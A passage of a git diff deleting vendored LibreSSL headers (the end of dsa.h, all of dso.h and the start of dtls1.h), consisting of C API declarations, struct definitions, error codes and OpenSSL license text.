-	DSA_SIG * (*dsa_do_sign)(const unsigned char *dgst, int dlen, DSA *dsa);
-	int (*dsa_sign_setup)(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
-								BIGNUM **rp);
-	int (*dsa_do_verify)(const unsigned char *dgst, int dgst_len,
-			     DSA_SIG *sig, DSA *dsa);
-	int (*dsa_mod_exp)(DSA *dsa, BIGNUM *rr, BIGNUM *a1, BIGNUM *p1,
-			BIGNUM *a2, BIGNUM *p2, BIGNUM *m, BN_CTX *ctx,
-			BN_MONT_CTX *in_mont);
-	int (*bn_mod_exp)(DSA *dsa, BIGNUM *r, BIGNUM *a, const BIGNUM *p,
-				const BIGNUM *m, BN_CTX *ctx,
-				BN_MONT_CTX *m_ctx); /* Can be null */
-	int (*init)(DSA *dsa);
-	int (*finish)(DSA *dsa);
-	int flags;
-	char *app_data;
-	/* If this is non-NULL, it is used to generate DSA parameters */
-	int (*dsa_paramgen)(DSA *dsa, int bits,
-			const unsigned char *seed, int seed_len,
-			int *counter_ret, unsigned long *h_ret,
-			BN_GENCB *cb);
-	/* If this is non-NULL, it is used to generate DSA keys */
-	int (*dsa_keygen)(DSA *dsa);
-	};
-
-struct dsa_st
-	{
-	/* This first variable is used to pick up errors where
-	 * a DSA is passed instead of of a EVP_PKEY */
-	int pad;
-	long version;
-	int write_params;
-	BIGNUM *p;
-	BIGNUM *q;	/* == 20 */
-	BIGNUM *g;
-
-	BIGNUM *pub_key;  /* y public key */
-	BIGNUM *priv_key; /* x private key */
-
-	BIGNUM *kinv;	/* Signing pre-calc */
-	BIGNUM *r;	/* Signing pre-calc */
-
-	int flags;
-	/* Normally used to cache montgomery values */
-	BN_MONT_CTX *method_mont_p;
-	int references;
-	CRYPTO_EX_DATA ex_data;
-	const DSA_METHOD *meth;
-	/* functional reference if 'meth' is ENGINE-provided */
-	ENGINE *engine;
-	};
-
-DSA *d2i_DSAparams_bio(BIO *bp, DSA **a);
-int i2d_DSAparams_bio(BIO *bp, DSA *a);
-DSA *d2i_DSAparams_fp(FILE *fp, DSA **a);
-int i2d_DSAparams_fp(FILE *fp, DSA *a);
-
-DSA *DSAparams_dup(DSA *x);
-DSA_SIG * DSA_SIG_new(void);
-void	DSA_SIG_free(DSA_SIG *a);
-int	i2d_DSA_SIG(const DSA_SIG *a, unsigned char **pp);
-DSA_SIG * d2i_DSA_SIG(DSA_SIG **v, const unsigned char **pp, long length);
-
-DSA_SIG * DSA_do_sign(const unsigned char *dgst,int dlen,DSA *dsa);
-int	DSA_do_verify(const unsigned char *dgst,int dgst_len,
-		      DSA_SIG *sig,DSA *dsa);
-
-const DSA_METHOD *DSA_OpenSSL(void);
-
-void	DSA_set_default_method(const DSA_METHOD *);
-const DSA_METHOD *DSA_get_default_method(void);
-int	DSA_set_method(DSA *dsa, const DSA_METHOD *);
-
-DSA *	DSA_new(void);
-DSA *	DSA_new_method(ENGINE *engine);
-void	DSA_free(DSA *r);
-/* "up" the DSA object's reference count */
-int	DSA_up_ref(DSA *r);
-int	DSA_size(const DSA *);
-	/* next 4 return -1 on error */
-int	DSA_sign_setup( DSA *dsa,BN_CTX *ctx_in,BIGNUM **kinvp,BIGNUM **rp);
-int	DSA_sign(int type,const unsigned char *dgst,int dlen,
-		unsigned char *sig, unsigned int *siglen, DSA *dsa);
-int	DSA_verify(int type,const unsigned char *dgst,int dgst_len,
-		const unsigned char *sigbuf, int siglen, DSA *dsa);
-int DSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int DSA_set_ex_data(DSA *d, int idx, void *arg);
-void *DSA_get_ex_data(DSA *d, int idx);
-
-DSA *d2i_DSAPublicKey(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAPublicKey(const DSA *a, unsigned char **pp);
-extern const ASN1_ITEM DSAPublicKey_it;
-
-DSA *d2i_DSAPrivateKey(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAPrivateKey(const DSA *a, unsigned char **pp);
-extern const ASN1_ITEM DSAPrivateKey_it;
-
-DSA *d2i_DSAparams(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAparams(const DSA *a,unsigned char **pp);
-extern const ASN1_ITEM DSAparams_it;
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-DSA *	DSA_generate_parameters(int bits,
-		unsigned char *seed,int seed_len,
-		int *counter_ret, unsigned long *h_ret,void
-		(*callback)(int, int, void *),void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int	DSA_generate_parameters_ex(DSA *dsa, int bits,
-		const unsigned char *seed,int seed_len,
-		int *counter_ret, unsigned long *h_ret, BN_GENCB *cb);
-
-int	DSA_generate_key(DSA *a);
-
-#ifndef OPENSSL_NO_BIO
-int	DSAparams_print(BIO *bp, const DSA *x);
-int	DSA_print(BIO *bp, const DSA *x, int off);
-#endif
-int	DSAparams_print_fp(FILE *fp, const DSA *x);
-int	DSA_print_fp(FILE *bp, const DSA *x, int off);
-
-#define DSS_prime_checks 50
-/* Primality test according to FIPS PUB 186[-1], Appendix 2.1:
- * 50 rounds of Rabin-Miller */
-#define DSA_is_prime(n, callback, cb_arg) \
-	BN_is_prime(n, DSS_prime_checks, callback, NULL, cb_arg)
-
-#ifndef OPENSSL_NO_DH
-/* Convert DSA structure (key or just parameters) into DH structure
- * (be careful to avoid small subgroup attacks when using this!) */
-DH *DSA_dup_DH(const DSA *r);
-#endif
-
-#define EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, nbits) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DSA, EVP_PKEY_OP_PARAMGEN, \
-				EVP_PKEY_CTRL_DSA_PARAMGEN_BITS, nbits, NULL)
-
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_BITS		(EVP_PKEY_ALG_CTRL + 1)
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_Q_BITS	(EVP_PKEY_ALG_CTRL + 2)
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_MD		(EVP_PKEY_ALG_CTRL + 3)
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DSA_strings(void);
-
-/* Error codes for the DSA functions. */
-
-/* Function codes. */
-#define DSA_F_D2I_DSA_SIG				 110
-#define DSA_F_DO_DSA_PRINT				 104
-#define DSA_F_DSAPARAMS_PRINT				 100
-#define DSA_F_DSAPARAMS_PRINT_FP			 101
-#define DSA_F_DSA_DO_SIGN				 112
-#define DSA_F_DSA_DO_VERIFY				 113
-#define DSA_F_DSA_GENERATE_KEY				 124
-#define DSA_F_DSA_GENERATE_PARAMETERS_EX		 123
-#define DSA_F_DSA_NEW_METHOD				 103
-#define DSA_F_DSA_PARAM_DECODE				 119
-#define DSA_F_DSA_PRINT_FP				 105
-#define DSA_F_DSA_PRIV_DECODE				 115
-#define DSA_F_DSA_PRIV_ENCODE				 116
-#define DSA_F_DSA_PUB_DECODE				 117
-#define DSA_F_DSA_PUB_ENCODE				 118
-#define DSA_F_DSA_SIGN					 106
-#define DSA_F_DSA_SIGN_SETUP				 107
-#define DSA_F_DSA_SIG_NEW				 109
-#define DSA_F_DSA_SIG_PRINT				 125
-#define DSA_F_DSA_VERIFY				 108
-#define DSA_F_I2D_DSA_SIG				 111
-#define DSA_F_OLD_DSA_PRIV_DECODE			 122
-#define DSA_F_PKEY_DSA_CTRL				 120
-#define DSA_F_PKEY_DSA_KEYGEN				 121
-#define DSA_F_SIG_CB					 114
-
-/* Reason codes. */
-#define DSA_R_BAD_Q_VALUE				 102
-#define DSA_R_BN_DECODE_ERROR				 108
-#define DSA_R_BN_ERROR					 109
-#define DSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 100
-#define DSA_R_DECODE_ERROR				 104
-#define DSA_R_INVALID_DIGEST_TYPE			 106
-#define DSA_R_MISSING_PARAMETERS			 101
-#define DSA_R_MODULUS_TOO_LARGE				 103
-#define DSA_R_NEED_NEW_SETUP_VALUES			 110
-#define DSA_R_NON_FIPS_DSA_METHOD			 111
-#define DSA_R_NO_PARAMETERS_SET				 107
-#define DSA_R_PARAMETER_ENCODING_ERROR			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dso.h b/thirdparty/libressl/include/openssl/dso.h
deleted file mode 100644
index 6c982c9..0000000
--- a/thirdparty/libressl/include/openssl/dso.h
+++ /dev/null
@@ -1,386 +0,0 @@
-/* $OpenBSD: dso.h,v 1.12 2016/03/15 20:50:22 krw Exp $ */
-/* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_DSO_H
-#define HEADER_DSO_H
-
-#include <openssl/crypto.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* These values are used as commands to DSO_ctrl() */
-#define DSO_CTRL_GET_FLAGS	1
-#define DSO_CTRL_SET_FLAGS	2
-#define DSO_CTRL_OR_FLAGS	3
-
-/* By default, DSO_load() will translate the provided filename into a form
- * typical for the platform (more specifically the DSO_METHOD) using the
- * dso_name_converter function of the method. Eg. win32 will transform "blah"
- * into "blah.dll", and dlfcn will transform it into "libblah.so". The
- * behaviour can be overridden by setting the name_converter callback in the DSO
- * object (using DSO_set_name_converter()). This callback could even utilise
- * the DSO_METHOD's converter too if it only wants to override behaviour for
- * one or two possible DSO methods. However, the following flag can be set in a
- * DSO to prevent *any* native name-translation at all - eg. if the caller has
- * prompted the user for a path to a driver library so the filename should be
- * interpreted as-is. */
-#define DSO_FLAG_NO_NAME_TRANSLATION		0x01
-/* An extra flag to give if only the extension should be added as
- * translation.  This is obviously only of importance on Unix and
- * other operating systems where the translation also may prefix
- * the name with something, like 'lib', and ignored everywhere else.
- * This flag is also ignored if DSO_FLAG_NO_NAME_TRANSLATION is used
- * at the same time. */
-#define DSO_FLAG_NAME_TRANSLATION_EXT_ONLY	0x02
-
-/* The following flag controls the translation of symbol names to upper
- * case.  This is currently only being implemented for OpenVMS.
- */
-#define DSO_FLAG_UPCASE_SYMBOL			0x10
-
-/* This flag loads the library with public symbols.
- * Meaning: The exported symbols of this library are public
- * to all libraries loaded after this library.
- * At the moment only implemented in unix.
- */
-#define DSO_FLAG_GLOBAL_SYMBOLS			0x20
-
-
-typedef void (*DSO_FUNC_TYPE)(void);
-
-typedef struct dso_st DSO;
-
-/* The function prototype used for method functions (or caller-provided
- * callbacks) that transform filenames. They are passed a DSO structure pointer
- * (or NULL if they are to be used independantly of a DSO object) and a
- * filename to transform. They should either return NULL (if there is an error
- * condition) or a newly allocated string containing the transformed form that
- * the caller will need to free with free() when done. */
-typedef char* (*DSO_NAME_CONVERTER_FUNC)(DSO *, const char *);
-/* The function prototype used for method functions (or caller-provided
- * callbacks) that merge two file specifications. They are passed a
- * DSO structure pointer (or NULL if they are to be used independantly of
- * a DSO object) and two file specifications to merge. They should
- * either return NULL (if there is an error condition) or a newly allocated
- * string containing the result of merging that the caller will need
- * to free with free() when done.
- * Here, merging means that bits and pieces are taken from each of the
- * file specifications and added together in whatever fashion that is
- * sensible for the DSO method in question.  The only rule that really
- * applies is that if the two specification contain pieces of the same
- * type, the copy from the first string takes priority.  One could see
- * it as the first specification is the one given by the user and the
- * second being a bunch of defaults to add on if they're missing in the
- * first. */
-typedef char* (*DSO_MERGER_FUNC)(DSO *, const char *, const char *);
-
-typedef struct dso_meth_st {
-	const char *name;
-	/* Loads a shared library, NB: new DSO_METHODs must ensure that a
-	 * successful load populates the loaded_filename field, and likewise a
-	 * successful unload frees and NULLs it out. */
-	int (*dso_load)(DSO *dso);
-	/* Unloads a shared library */
-	int (*dso_unload)(DSO *dso);
-	/* Binds a variable */
-	void *(*dso_bind_var)(DSO *dso, const char *symname);
-	/* Binds a function - assumes a return type of DSO_FUNC_TYPE.
-	 * This should be cast to the real function prototype by the
-	 * caller. Platforms that don't have compatible representations
-	 * for different prototypes (this is possible within ANSI C)
-	 * are highly unlikely to have shared libraries at all, let
-	 * alone a DSO_METHOD implemented for them. */
-	DSO_FUNC_TYPE (*dso_bind_func)(DSO *dso, const char *symname);
-
-	/* The generic (yuck) "ctrl()" function. NB: Negative return
-	 * values (rather than zero) indicate errors. */
-	long (*dso_ctrl)(DSO *dso, int cmd, long larg, void *parg);
-	/* The default DSO_METHOD-specific function for converting filenames to
-	 * a canonical native form. */
-	DSO_NAME_CONVERTER_FUNC dso_name_converter;
-	/* The default DSO_METHOD-specific function for converting filenames to
-	 * a canonical native form. */
-	DSO_MERGER_FUNC dso_merger;
-
-	/* [De]Initialisation handlers. */
-	int (*init)(DSO *dso);
-	int (*finish)(DSO *dso);
-
-	/* Return pathname of the module containing location */
-	int (*pathbyaddr)(void *addr, char *path, int sz);
-	/* Perform global symbol lookup, i.e. among *all* modules */
-	void *(*globallookup)(const char *symname);
-} DSO_METHOD;
-
-/**********************************************************************/
-/* The low-level handle type used to refer to a loaded shared library */
-
-struct dso_st {
-	DSO_METHOD *meth;
-	/* Standard dlopen uses a (void *). Win32 uses a HANDLE. VMS
-	 * doesn't use anything but will need to cache the filename
-	 * for use in the dso_bind handler. All in all, let each
-	 * method control its own destiny. "Handles" and such go in
-	 * a STACK. */
-	STACK_OF(void) *meth_data;
-	int references;
-	int flags;
-	/* For use by applications etc ... use this for your bits'n'pieces,
-	 * don't touch meth_data! */
-	CRYPTO_EX_DATA ex_data;
-	/* If this callback function pointer is set to non-NULL, then it will
-	 * be used in DSO_load() in place of meth->dso_name_converter. NB: This
-	 * should normally set using DSO_set_name_converter(). */
-	DSO_NAME_CONVERTER_FUNC name_converter;
-	/* If this callback function pointer is set to non-NULL, then it will
-	 * be used in DSO_load() in place of meth->dso_merger. NB: This
-	 * should normally set using DSO_set_merger(). */
-	DSO_MERGER_FUNC merger;
-	/* This is populated with (a copy of) the platform-independant
-	 * filename used for this DSO. */
-	char *filename;
-	/* This is populated with (a copy of) the translated filename by which
-	 * the DSO was actually loaded. It is NULL iff the DSO is not currently
-	 * loaded. NB: This is here because the filename translation process
-	 * may involve a callback being invoked more than once not only to
-	 * convert to a platform-specific form, but also to try different
-	 * filenames in the process of trying to perform a load. As such, this
-	 * variable can be used to indicate (a) whether this DSO structure
-	 * corresponds to a loaded library or not, and (b) the filename with
-	 * which it was actually loaded. */
-	char *loaded_filename;
-};
-
-
-DSO *	DSO_new(void);
-DSO *	DSO_new_method(DSO_METHOD *method);
-int	DSO_free(DSO *dso);
-int	DSO_flags(DSO *dso);
-int	DSO_up_ref(DSO *dso);
-long	DSO_ctrl(DSO *dso, int cmd, long larg, void *parg);
-
-/* This function sets the DSO's name_converter callback. If it is non-NULL,
- * then it will be used instead of the associated DSO_METHOD's function. If
- * oldcb is non-NULL then it is set to the function pointer value being
- * replaced. Return value is non-zero for success. */
-int	DSO_set_name_converter(DSO *dso, DSO_NAME_CONVERTER_FUNC cb,
-	    DSO_NAME_CONVERTER_FUNC *oldcb);
-/* These functions can be used to get/set the platform-independant filename
- * used for a DSO. NB: set will fail if the DSO is already loaded. */
-const char *DSO_get_filename(DSO *dso);
-int	DSO_set_filename(DSO *dso, const char *filename);
-/* This function will invoke the DSO's name_converter callback to translate a
- * filename, or if the callback isn't set it will instead use the DSO_METHOD's
- * converter. If "filename" is NULL, the "filename" in the DSO itself will be
- * used. If the DSO_FLAG_NO_NAME_TRANSLATION flag is set, then the filename is
- * simply duplicated. NB: This function is usually called from within a
- * DSO_METHOD during the processing of a DSO_load() call, and is exposed so that
- * caller-created DSO_METHODs can do the same thing. A non-NULL return value
- * will need to be free()'d. */
-char	*DSO_convert_filename(DSO *dso, const char *filename);
-/* This function will invoke the DSO's merger callback to merge two file
- * specifications, or if the callback isn't set it will instead use the
- * DSO_METHOD's merger.  A non-NULL return value will need to be
- * free()'d. */
-char	*DSO_merge(DSO *dso, const char *filespec1, const char *filespec2);
-/* If the DSO is currently loaded, this returns the filename that it was loaded
- * under, otherwise it returns NULL. So it is also useful as a test as to
- * whether the DSO is currently loaded. NB: This will not necessarily return
- * the same value as DSO_convert_filename(dso, dso->filename), because the
- * DSO_METHOD's load function may have tried a variety of filenames (with
- * and/or without the aid of the converters) before settling on the one it
- * actually loaded. */
-const char *DSO_get_loaded_filename(DSO *dso);
-
-void	DSO_set_default_method(DSO_METHOD *meth);
-DSO_METHOD *DSO_get_default_method(void);
-DSO_METHOD *DSO_get_method(DSO *dso);
-DSO_METHOD *DSO_set_method(DSO *dso, DSO_METHOD *meth);
-
-/* The all-singing all-dancing load function, you normally pass NULL
- * for the first and third parameters. Use DSO_up and DSO_free for
- * subsequent reference count handling. Any flags passed in will be set
- * in the constructed DSO after its init() function but before the
- * load operation. If 'dso' is non-NULL, 'flags' is ignored. */
-DSO *DSO_load(DSO *dso, const char *filename, DSO_METHOD *meth, int flags);
-
-/* This function binds to a variable inside a shared library. */
-void *DSO_bind_var(DSO *dso, const char *symname);
-
-/* This function binds to a function inside a shared library. */
-DSO_FUNC_TYPE DSO_bind_func(DSO *dso, const char *symname);
-
-/* This method is the default, but will beg, borrow, or steal whatever
- * method should be the default on any particular platform (including
- * DSO_METH_null() if necessary). */
-DSO_METHOD *DSO_METHOD_openssl(void);
-
-/* This method is defined for all platforms - if a platform has no
- * DSO support then this will be the only method! */
-DSO_METHOD *DSO_METHOD_null(void);
-
-/* If DSO_DLFCN is defined, the standard dlfcn.h-style functions
- * (dlopen, dlclose, dlsym, etc) will be used and incorporated into
- * this method. If not, this method will return NULL. */
-DSO_METHOD *DSO_METHOD_dlfcn(void);
-
-/* This function writes null-terminated pathname of DSO module
- * containing 'addr' into 'sz' large caller-provided 'path' and
- * returns the number of characters [including trailing zero]
- * written to it. If 'sz' is 0 or negative, 'path' is ignored and
- * required amount of charachers [including trailing zero] to
- * accommodate pathname is returned. If 'addr' is NULL, then
- * pathname of cryptolib itself is returned. Negative or zero
- * return value denotes error.
- */
-int DSO_pathbyaddr(void *addr, char *path, int sz);
-
-/* This function should be used with caution! It looks up symbols in
- * *all* loaded modules and if module gets unloaded by somebody else
- * attempt to dereference the pointer is doomed to have fatal
- * consequences. Primary usage for this function is to probe *core*
- * system functionality, e.g. check if getnameinfo(3) is available
- * at run-time without bothering about OS-specific details such as
- * libc.so.versioning or where does it actually reside: in libc
- * itself or libsocket. */
-void *DSO_global_lookup(const char *name);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DSO_strings(void);
-
-/* Error codes for the DSO functions. */
-
-/* Function codes. */
-#define DSO_F_BEOS_BIND_FUNC				 144
-#define DSO_F_BEOS_BIND_VAR				 145
-#define DSO_F_BEOS_LOAD					 146
-#define DSO_F_BEOS_NAME_CONVERTER			 147
-#define DSO_F_BEOS_UNLOAD				 148
-#define DSO_F_DLFCN_BIND_FUNC				 100
-#define DSO_F_DLFCN_BIND_VAR				 101
-#define DSO_F_DLFCN_LOAD				 102
-#define DSO_F_DLFCN_MERGER				 130
-#define DSO_F_DLFCN_NAME_CONVERTER			 123
-#define DSO_F_DLFCN_UNLOAD				 103
-#define DSO_F_DL_BIND_FUNC				 104
-#define DSO_F_DL_BIND_VAR				 105
-#define DSO_F_DL_LOAD					 106
-#define DSO_F_DL_MERGER					 131
-#define DSO_F_DL_NAME_CONVERTER				 124
-#define DSO_F_DL_UNLOAD					 107
-#define DSO_F_DSO_BIND_FUNC				 108
-#define DSO_F_DSO_BIND_VAR				 109
-#define DSO_F_DSO_CONVERT_FILENAME			 126
-#define DSO_F_DSO_CTRL					 110
-#define DSO_F_DSO_FREE					 111
-#define DSO_F_DSO_GET_FILENAME				 127
-#define DSO_F_DSO_GET_LOADED_FILENAME			 128
-#define DSO_F_DSO_GLOBAL_LOOKUP				 139
-#define DSO_F_DSO_LOAD					 112
-#define DSO_F_DSO_MERGE					 132
-#define DSO_F_DSO_NEW_METHOD				 113
-#define DSO_F_DSO_PATHBYADDR				 140
-#define DSO_F_DSO_SET_FILENAME				 129
-#define DSO_F_DSO_SET_NAME_CONVERTER			 122
-#define DSO_F_DSO_UP_REF				 114
-#define DSO_F_GLOBAL_LOOKUP_FUNC			 138
-#define DSO_F_PATHBYADDR				 137
-#define DSO_F_VMS_BIND_SYM				 115
-#define DSO_F_VMS_LOAD					 116
-#define DSO_F_VMS_MERGER				 133
-#define DSO_F_VMS_UNLOAD				 117
-#define DSO_F_WIN32_BIND_FUNC				 118
-#define DSO_F_WIN32_BIND_VAR				 119
-#define DSO_F_WIN32_GLOBALLOOKUP			 142
-#define DSO_F_WIN32_GLOBALLOOKUP_FUNC			 143
-#define DSO_F_WIN32_JOINER				 135
-#define DSO_F_WIN32_LOAD				 120
-#define DSO_F_WIN32_MERGER				 134
-#define DSO_F_WIN32_NAME_CONVERTER			 125
-#define DSO_F_WIN32_PATHBYADDR				 141
-#define DSO_F_WIN32_SPLITTER				 136
-#define DSO_F_WIN32_UNLOAD				 121
-
-/* Reason codes. */
-#define DSO_R_CTRL_FAILED				 100
-#define DSO_R_DSO_ALREADY_LOADED			 110
-#define DSO_R_EMPTY_FILE_STRUCTURE			 113
-#define DSO_R_FAILURE					 114
-#define DSO_R_FILENAME_TOO_BIG				 101
-#define DSO_R_FINISH_FAILED				 102
-#define DSO_R_INCORRECT_FILE_SYNTAX			 115
-#define DSO_R_LOAD_FAILED				 103
-#define DSO_R_NAME_TRANSLATION_FAILED			 109
-#define DSO_R_NO_FILENAME				 111
-#define DSO_R_NO_FILE_SPECIFICATION			 116
-#define DSO_R_NULL_HANDLE				 104
-#define DSO_R_SET_FILENAME_FAILED			 112
-#define DSO_R_STACK_ERROR				 105
-#define DSO_R_SYM_FAILURE				 106
-#define DSO_R_UNLOAD_FAILED				 107
-#define DSO_R_UNSUPPORTED				 108
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dtls1.h b/thirdparty/libressl/include/openssl/dtls1.h
deleted file mode 100644
index 31ba065..0000000
--- a/thirdparty/libressl/include/openssl/dtls1.h
+++ /dev/null
@@ -1,190 +0,0 @@
-/* $OpenBSD: dtls1.h,v 1.21 2017/01/22 07:16:39 beck Exp $ */
-/*
- * DTLS implementation written by Nagendra Modadugu
- * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
- */
-/* ====================================================================
- * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_DTLS1_H
-#define HEADER_DTLS1_H
-
-#if defined(_WIN32)
-#include <winsock2.h>
-#else
-#include <sys/time.h>
-#endif
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <openssl/opensslconf.h>
-#include <openssl/buffer.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define DTLS1_VERSION			0xFEFF
-
-/* lengths of messages */
-#define DTLS1_COOKIE_LENGTH                     256
-
-#define DTLS1_RT_HEADER_LENGTH                  13
-
-#define DTLS1_HM_HEADER_LENGTH                  12
-
-#define DTLS1_HM_BAD_FRAGMENT                   -2
-#define DTLS1_HM_FRAGMENT_RETRY                 -3
-
-#define DTLS1_CCS_HEADER_LENGTH                  1
-
-#ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
-#define DTLS1_AL_HEADER_LENGTH                   7
-#else
-#define DTLS1_AL_HEADER_LENGTH                   2
-#endif
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-
-typedef struct dtls1_bitmap_st {
-	unsigned long map;		/* track 32 packets on 32-bit systems
-					   and 64 - on 64-bit systems */
-	unsigned char max_seq_num[8];	/* max record number seen so far,
-					   64-bit value in big-endian
-					   encoding */
-} DTLS1_BITMAP;
-
-struct dtls1_retransmit_state {
-	EVP_CIPHER_CTX *enc_write_ctx;	/* cryptographic state */
-	EVP_MD_CTX *write_hash;		/* used for mac generation */
-	SSL_SESSION *session;
-	unsigned short epoch;
-};
-
-struct hm_header_st {
-	unsigned char type;
-	unsigned long msg_len;
-	unsigned short seq;
-	unsigned long frag_off;
-	unsigned long frag_len;
-	unsigned int is_ccs;
-	struct dtls1_retransmit_state saved_retransmit_state;
-};
-
-struct ccs_header_st {
-	unsigned char type;
-	unsigned short seq;
-};
-
-struct dtls1_timeout_st {
-	/* Number of read timeouts so far */
-	unsigned int read_timeouts;
-
-	/* Number of write timeouts so far */
-	unsigned int write_timeouts;
-
-	/* Number of alerts received so far */
-	unsigned int num_alerts;
-};
-
-struct _pqueue;
-
-typedef struct record_pqueue_st {
-	unsigned short epoch;
-	struct _pqueue *q;
-} record_pqueue;
-
-typedef struct hm_fragment_st {
-	struct hm_header_st msg_header;
-	unsigned char *fragment;
-	unsigned char *reassembly;
-} hm_fragment;
-
-struct dtls1_state_internal_st;
-
-typedef struct dtls1_state_st {
-	/* Buffered (sent) handshake records */
-	struct _pqueue *sent_messages;
-
